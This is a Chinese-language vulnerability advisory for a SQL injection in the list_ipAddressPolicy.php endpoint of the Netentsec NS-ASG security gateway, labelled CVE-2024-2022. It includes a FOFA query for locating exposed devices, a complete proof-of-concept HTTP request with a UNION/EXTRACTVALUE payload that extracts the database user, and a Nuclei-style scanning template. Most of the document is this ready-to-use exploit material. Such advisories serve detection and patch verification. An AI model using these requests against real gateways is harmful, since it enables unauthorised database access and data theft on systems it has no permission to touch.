一、漏洞信息
漏洞名称:
网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞
漏洞类别: SQL注入漏洞
风险等级: 高危
二、漏洞描述
网康应用安全网关(NS-ASG) list_ipAddressPolicy 接口存在SQL注入漏洞。
攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
三、影响范围
网康应用安全网关(NS-ASG)
四、漏洞复现
FOFA:app="网康-NS-ASG-应用安全网关"
POC:
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
五、脚本
id: CVE-2024-2022
info:
name: 网康NS-ASG应用安全网关sql注入漏洞
severity: high
author: tt
metadata:
max-request: 1
fofa-query: app="网康科技-NS-ASG安全网关"
verified: true
requests:
- raw:
- |+
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(123456)),0x7e)) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body, 'e10adc3949ba59abbe56e057f20f883e')"